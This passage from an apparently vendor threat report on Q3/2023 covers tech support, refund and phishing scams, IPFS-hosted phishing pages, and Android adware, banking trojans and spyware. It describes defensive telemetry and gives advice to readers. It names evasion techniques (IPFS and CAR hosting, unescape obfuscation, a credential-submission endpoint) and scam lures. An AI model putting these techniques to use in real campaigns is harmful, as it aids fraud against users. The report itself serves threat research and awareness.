<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-1024x639.png" alt="" class="wp-image-7869" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Heatmap showing risk-ratio for Q3/2023</em></figcaption></figure></div>
<p>For all the years we have been monitoring tech support scams, the design of the site has barely changed. The main goal is to block the browser in such a way that the user is motivated to pick up the phone and call the provided phone number. </p>
<p>On following example, you can see the German variant. At the same time, Germany had the highest risk ratio in the third quarter despite the overall general decline. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="720" height="521" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-tech-support-website.gif" alt="" class="wp-image-7842"/><figcaption class="wp-element-caption"><em>The German variant of the most prevalent version of the TSS landing page</em></figcaption></figure></div>
<p>The appearance of the pages is not the only clearly recognizable sign. The URL composition of these scams is no less interesting. It is often possible to recognize the type of campaign and its focus. Sometimes they even contain scam phone numbers as seen in the following illustration. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="729" height="155" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/21_TSS_URLs.png" alt="" class="wp-image-7870" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/21_TSS_URLs.png 729w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/21_TSS_URLs-300x64.png 300w" sizes="(max-width: 729px) 100vw, 729px" /><figcaption class="wp-element-caption"><em>An example of URLs from a prevalent campaign containing scammer phone numbers</em></figcaption></figure></div>
<h3 class="wp-block-heading">Refund and Invoice Scams </h3>
<p><em>Invoice scams involve fraudsters sending false bills or invoices for goods or services that were never ordered or received. Scammers rely on invoices looking legitimate, often using company logos or other branding to trick unsuspecting victims into making payments. These scams can be especially effective when targeted at businesses, as employees may assume that a colleague made the purchase or simply overlook the details of the invoice. It is important to carefully review all invoices and bills before making any payments and to verify the legitimacy of the sender if there are any suspicions of fraud.</em> </p>
<p>In Australia, the past quarter has been an exception to the otherwise consistent trend, with a significant spike and sudden rise in email-targeted scams. Notably, the rise in protected customers in Australia surpassed even that in the US, which is traditionally at the top of the list. The number of threats we monitored in other regions mainly stayed at very similar numbers compared to previous quarters.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-1024x639.png" alt="" class="wp-image-7871" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Refund and Invoice Scam risk ratio in Q3/2023</em></figcaption></figure></div>
<p>The highest uptick we observed was primarily due to the rise in Australia. Additionally, we noticed that smaller peaks usually occur at the beginning of the working week. This is when people generally sift through their mailboxes, and their vigilance may be lowered because of the larger volume of data they have to process. Therefore, one takeaway is that it definitely helps to take your time and sift through your emails in a peaceful manner, as rushing may increase the chance of falling victim to a scam. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-1024x404.png" alt="" class="wp-image-7872" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Refund and Invoice Scam in Q2/2023 and Q3/2023</em></figcaption></figure></div>
<p>In this quarterly report, we have chosen to spotlight a sample predominantly prevalent in Australia, as it experienced a nearly 30% increase compared to the previous period. This example was selected for its demonstration of many features increasingly noticeable in various other types of scams. The points we will mention should improve your ability to spot similar scams. Below is a breakdown of this deceitful email: </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="603" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example-603x1024.png" alt="" class="wp-image-7873" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example-603x1024.png 603w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example-177x300.png 177w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example.png 670w" sizes="(max-width: 603px) 100vw, 603px" /><figcaption class="wp-element-caption"><em>Example of a Refund and Invoice Scam seen in Q3/2023</em></figcaption></figure></div>
<p>This scam email contains a few typical scam traits: </p>
<ul>
<li><strong>Attention-Grabbing Subject Line</strong>: “Dark Web Discovery: Your 30 Photos and 5 Emails Exposed!” By creating a sense of immediate danger, the sender aims to provoke curiosity and urgency. </li>
<li><strong>Impersonation of a Legitimate Entity</strong>: The email is supposedly from a “Support Team”, which sounds official and trustworthy. However, the domain ‘<a href="mailto:@canadialect.com" target="_blank" rel="noreferrer noopener">@canadialect.com</a>‘ raises eyebrows. Always double-check the authenticity of the domain. </li>
<li><strong>Urgency and Fear</strong>: The email highlights that the recipient’s “subscription has expired,” implying prior engagement or services with them. It also claims a discovery of personal photos and email addresses on the Dark Web. </li>
<li><strong>Detailed Alarming Findings</strong>: The message dives deeper into the ‘findings’, mentioning “30 photos of you” and “2 email addresses” associated with the recipient found in dark web forums. Providing specifics makes the scam seem more credible. </li>
<li><strong>A Tempting Offer</strong>: Following the alarming statements, there is a solution offered – a “(80%) renewal discount Today” on their service. This discount plays on the human tendency to seek quick resolutions when faced with threats. </li>
<li><strong>Clear Call to Action</strong>: The bold “Renew Now!” button at the end of the email serves as a clear directive for the panicked reader. Clicking on such links often leads to phishing sites or direct financial scams. </li>
</ul>
<p>As a parting word of advice, always be skeptical of unsolicited emails, especially those that invoke fear and urgency. Verify claims independently and avoid clicking on links or downloading attachments from unknown senders. </p>
<h3 class="wp-block-heading">Phishing </h3>
<p><em>Phishing is a type of online scam where fraudsters attempt to obtain sensitive information including passwords or credit card details by posing as a trustworthy entity in an electronic communication, such as an email, text message, or instant message. The fraudulent message usually contains a link to a fake website that looks like the real one, where the victim is asked to enter their sensitive information.</em> </p>
<p>In the Q2/2023 Threat Report, we pointed out that phishing activity was picking up. Now we can confidently confirm that our estimates were correct and after a dip in mid-July, a wave of new samples arrived in August, which then represents a big jump on the chart. </p>
<p>The following graph illustrates the activity of phishing threats across two quarters. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-1024x404.png" alt="" class="wp-image-7874" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Risk ratio for Q2-Q3/2023 of phishing threats</em></figcaption></figure></div>
<p>Furthermore, we have observed an emerging trend in phishing delivery methods. Over the past few months, there has been a notable uptick in the use of InterPlanetary File System (IPFS) to disseminate phishing content. This decentralized protocol, designed for storing and sharing files, has become an attractive avenue for cybercriminals.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-1024x404.png" alt="" class="wp-image-7875" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>IPFS-based attacks and the related risk ratio in Q3/202</em>3</figcaption></figure></div>
<p>In addition to IPFS, we have also witnessed cybercriminals turning to the CAR file format, which poses a unique challenge for traditional HTML scanners, allowing it to potentially bypass detection. This exclusive preference for such hosting methods among hackers can be attributed to their ease of deployment and the added complexity in takedown procedures, providing an advantageous environment for malicious activities.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="541" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-1024x541.png" alt="" class="wp-image-7876" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-1024x541.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-300x158.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-768x405.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example.png 1254w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example of a phishing page using IPFS</em></figcaption></figure></div>
<p>Campaigns that are running on IPFS infrastructure quite often use some type of obfuscation. In most cases these are very basic types and their deobfuscation is very simple. </p>
<p>In this prevalent example you can see that the HTML code itself has been encoded to make it unreadable. Therefore, the JavaScript feature unescape() is used. Despite the fact that the use of this function is not recommended, because it has been deprecated, it often appears in IPFS samples. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="528" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-1024x528.png" alt="" class="wp-image-7877" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-1024x528.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-300x155.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-768x396.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-1536x791.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example.png 1539w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Source code is typically obfuscated</figcaption></figure></div>
<p>In decoded HTML source code, you can see that scammers are using submit-form.com endpoint for credentials submission.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="273" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-1024x273.png" alt="" class="wp-image-7878" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-1024x273.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-300x80.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-768x205.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example.png 1392w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Deobfuscated source code of IPFS phishing sample</em></figcaption></figure></div>
<p>Analyzing the data for Q3/2023 Argentina, Brazil, Mexico, and Spain are countries with a significant increase in Q/Q risk ratio for phishing. Countries with the highest overall risk ration are Macao with 19.47%, Angola with 13.14% or Pakistan with risk ratio of 12.8%.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-1024x639.png" alt="" class="wp-image-7879" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio of phishing in Q3/2023</em></figcaption></figure></div>
<p>Phishing has long been the classic and primary way to steal valuable data from users. A growing trend points out that although this is a relatively old method, it is far from being obsolete.</p>
<p class="has-text-align-right"><em>Alexej Savčin, Malware Analyst<br>Martin Chlumecký, Malware Researcher<br>Branislav Kramár, Malware Analyst<br>Bohumír Fajt, Malware Analysis Team Lead<br>Jan Rubín, Malware Researcher</em></p>
<h2 class="wp-block-heading">Mobile-Related Threats </h2>
<p>Another quarter, another set of varied and interesting developments hitting the mobile threat landscape. Related to the escalating situation between Israel and Palestine, a spyware mimics a missile warning application used in Israel with the intent of stealing victim data. Also of note is the Xenomorph banker that has added new features and is spreading alongside a Windows info-stealer.  </p>
<p>A new strain of Invisible Adware displays and clicks on adverts while the device screen is off, raking in fraudulent ad revenue and draining victim’s batteries and data allowances. We also observed several new versions of SpyNote this quarter, with one breaching the border between spyware and banker malware. </p>
<p>Popular messenger application mods such as Telegram, Signal and WhatsApp continue to be abused to serve spyware. And finally, SpyLoans continue to spread on PlayStore and threaten vulnerable victims with extortion. </p>
<h3 class="wp-block-heading">Web-Threats Data in the Mobile Landscape </h3>
<p>Like on Desktop, we have introduced web-threat related data into our mobile threat report this quarter. This added data reflects a re-shuffle of the most prevalent threats facing mobile users today. As evidenced by the graphic below, scams, phishing and malvertising are responsible for the majority of blocked attacks on mobile.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown.png"><img loading="lazy" decoding="async" width="1024" height="436" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-1024x436.png" alt="" class="wp-image-7791" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-1024x436.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-300x128.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-768x327.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown.png 1195w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Graphs showing the most prevalent threats in the mobile sphere in Q3/2023</em> </figcaption></figure></div>
<p>It makes sense that web-based threats will account for the majority of blocked attacks on mobile as well as desktop. With any malicious app on Android, user action is required to install it and, in most cases, the malware requires the user to enable some permissions for it to activate its malicious functionality. Contrary to this, web-based scams, phishing and malvertising can be encountered through normal browsing activity which most mobile users do every day. These web threats may also be contained in private messages, email, SMS, and others. </p>
<h3 class="wp-block-heading">Adware Becomes Nearly Invisible </h3>
<p><em>Adware threats on mobile phones refer to applications that display intrusive out-of-context adverts to users with the intent of gathering fraudulent advertising revenue. This malicious functionality is often delayed until sometime after installation and coupled with stealthy features such as hiding the adware app icon to prevent removal. Adware mimics popular apps such as games, camera filters, and wallpaper apps, to name a few.</em> </p>
<p>Despite the addition of web threats data, adware remains one of the most prevalent threats on mobile and retains its top spot among traditional malware apps. Serving intrusive advertisements to its victims with the intent of gathering fraudulent ad revenue, these apps pose a danger and annoyance to both users and advertisers alike. </p>
<p>At the top of the adware list is HiddenAds, followed by MobiDash and FakeAdBlock strains. While both MobiDash and FakeAdBlock have seen over 40% decrease in protected users, HiddenAds is on the rise again with a bump of 15% in protected users. All three strains share some features such as hiding their icon and displaying out-of-context full screen ads that annoy victims. HiddenAds has historically relied on the PlayStore as a mode of spread, while the others generally rely on 3<sup>rd</sup> party app stores, malicious redirects, and advertisements. Of note is a recent addition to the stealth features of these adware apps; once installed, they display a fake error stating the app is not available in the victim’s region or country with an ‘installation failed’ message. Coupled with hiding its icon, the adware conducts its malicious behavior in the background while the victim remains unaware of the source of the fraudulent ads.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="733" height="495" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Fake-error-message.jpg" alt="" class="wp-image-7792" style="width:417px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Fake-error-message.jpg 733w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Fake-error-message-300x203.jpg 300w" sizes="(max-width: 733px) 100vw, 733px" /><figcaption class="wp-element-caption"><em>MobiDash adware tries to trick its victim by displaying a fake error message after install </em> </figcaption></figure></div>
<p>This quarter a new batch of adware dubbed <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/invisible-adware-unveiling-ad-fraud-targeting-android-users/" target="_blank" rel="noreferrer noopener">Invisible Adware</a> has snuck onto the PlayStore and gathered over two million downloads. True to their name, these applications try and display advertisements while the device screen is off. In essence, the victim would be unaware their phone is displaying ads while the malicious actors gather revenue through fake clicks and ad views. However, this will likely impact the device battery and potentially incur data charges, while at the same time contributing to ad fraud. The applications request permissions to run in background and ignore battery optimization to conduct their activity. While observed behavior is that of ad fraud, there is also potential for installing other malware or visiting malicious websites.  </p>
<p>The average daily protected users slightly increased when compared to last quarter. MobiDash and FakeAdBlock strains have gone down while HiddenAds continue to increase in popularity. Another campaign on PlayStore contributes to the steady numbers this quarter. </p>
<p>Brazil, India, and Argentina are again at the top of the most affected users by adware this quarter. Argentina saw a 14% increase in monthly affected users. India, Indonesia, and Paraguay have the highest risk ratio this quarter, meaning users is these countries are most likely to encounter adware.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-1024x639.png" alt="" class="wp-image-7793" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for mobile adware in Q3/2023</em>  </figcaption></figure></div>
<h3 class="wp-block-heading">Bankers Welcome SpyNote into the Fold </h3>
<p><em>Bankers are a sophisticated type of mobile malware that targets banking details, cryptocurrency wallets, and instant payments with the intent of extracting money. Generally distributed through phishing messages or fake websites, Bankers can take over a victim’s device by abusing the accessibility service. Once installed and enabled, they often monitor 2FA SMS messages and may display fake bank overlays to steal login information.</em> </p>
<p>Banker evolution continues this quarter with several new strains alongside updates to existing ones. Xenomorph makes a return with some new features, GoldDigger makes an entrance and SpyNote breaches the divide between spyware and bankers. Despite the new arrivals and updates, bankers overall have been on a steady decline in terms of protected users in our telemetry for the last few quarters. Cerberus/Alien maintains its top spot this quarter, trailed by Coper and Hydra strains. We observe an over 20% decrease in monthly average protected users this quarter on all top three banker strains. </p>
<p><a href="https://www.threatfabric.com/blogs/xenomorph" target="_blank" rel="noreferrer noopener">Xenomorph</a> is back after a few months hiatus and has evolved again with several added features and a new method of spread. It appears that this new campaign mainly targets bank users in Spain, US and Portugal as well as adding crypto wallets to its repertoire. Using tailored phishing websites disguised as chrome updates, Xenomorph tricks victims into downloading its malicious APK. Once installed, it uses the accessibility service to take over the device, monitoring 2FA messages and can display hundreds of fake bank overlays to its victim to steal login credentials. New features include keeping the device awake, a mimic mode that disguises the malware further and hides its icon, and lastly it can click anywhere on the device’s screen. Interestingly, Xenomorph was observed to be served alongside RisePro, a Windows based info stealer that also targets banking details and crypto wallets. This may point to a coordinated effort between various actors or a single actor behind multiple strains of malware. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="655" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-655x1024.jpg" alt="" class="wp-image-7794" style="width:420px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-655x1024.jpg 655w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-192x300.jpg 192w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-768x1201.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-982x1536.jpg 982w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions.jpg 1078w" sizes="(max-width: 655px) 100vw, 655px" /><figcaption class="wp-element-caption"><em>A ‘tooltip’ displayed to the victims of Xenomorph once it is installed on the device</em> </figcaption></figure></div>
<p>A banker targeting victims in Vietnam pretending to be a government portal or a local energy company has been discovered and codenamed <a href="https://www.group-ib.com/blog/golddigger-fraud-matrix/" target="_blank" rel="noreferrer noopener">GoldDigger</a>. It uses Virbox Protector, a publicly available software that can obfuscate code and prevent both dynamic and static analysis. This appears to be a growing trend in Southeast Asia in recent years, as the use of advanced obfuscation can mean the malware goes undetected for longer. GoldDigger uses fake websites that imitate the PlayStore or phishing in private messages to spread itself. Once on the device, it can steal 2FA SMS as well as personal information and banking credentials. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="576" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-576x1024.jpg" alt="" class="wp-image-7795" style="width:420px" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-576x1024.jpg 576w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-169x300.jpg 169w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-768x1365.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-864x1536.jpg 864w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen.jpg 1080w" sizes="(max-width: 576px) 100vw, 576px" /><figcaption class="wp-element-caption"><em>GoldDigger displays a fake splash screen to its victim (in Vietnamese), followed by a request to enable the Accessibility service</em> </figcaption></figure></div>
<p>In an unusual twist, <a href="https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions" target="_blank" rel="noreferrer noopener">SpyNote</a> has further evolved to the point of breaching into the banking sphere. Recent samples that we have observed are starting to use the spy features of this strain to extract 2FA messages as well as banking credentials and logins. Spreading through smishing and actual phone calls, victims are encouraged to update to a latest version of their banking application, which unfortunately is the SpyNote malware. This version of SpyNote uses the Accessibility service to key log victim’s entries, record the screen and extract confidential information. It also features a defense module that is intended to prevent its removal. As mentioned in previous quarterly reports, we are seeing more spyware strains being re-used in the banking sphere and we anticipate this merging of strains will continue going forward. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="628" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-628x1024.jpg" alt="" class="wp-image-7796" style="width:420px" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-628x1024.jpg 628w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-184x300.jpg 184w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-768x1252.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-942x1536.jpg 942w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up.jpg 1072w" sizes="(max-width: 628px) 100vw, 628px" /><figcaption class="wp-element-caption"><em>An unfinished SpyNote sample displays a fake update message that downloads further malicious APKs</em> </figcaption></figure></div>
<p>Despite continued activity, updated strains and new bankers entering the market, we observe a steady decline in attacked users for several quarters in a row. We estimate that this is due to threat actors using more tailored approaches as of late as we observe less widespread SMS campaigns that were signature of FluBot and others a few quarters ago.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-1024x404.png" alt="" class="wp-image-7797" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio of mobile bankers in Q4/2022-Q3/2023</em></figcaption></figure></div>
<p>Turkey continues to hold top place with the most protected users, closely followed by Spain, France, and the UK. Most of the banker focus appears to be on Europe, with a few exceptions such as Brazil, Japan, and Australia.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-1024x639.png" alt="" class="wp-image-7798" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for mobile bankers in Q3/2023</em>  </figcaption></figure></div>
<h3 class="wp-block-heading">Spyware Telegram Mods Are on the Rise </h3>
<p><em>Spyware is used to spy on unsuspecting victims with the intent of extracting personal information such as messages, photos, location, or login details. It uses fake adverts, phishing messages, and modifications of popular applications to spread and harvest user information. State backed commercial spyware is becoming more prevalent and is used to target individuals with 0-day exploits.</em> </p>
<p>Spyware presence has slightly declined this quarter as Spymax maintains its top spot among the spyware strains with SexInfoSteal and FaceStealer trailing closely behind. New additions to the spyware family this quarter include several new trojanized modifications of popular messenger applications and SpyNote making another appearance. We note the spread of a fake spyware missile alert app in Israel and Spyloans continue their reign as several new samples have been spotted on the PlayStore.  </p>
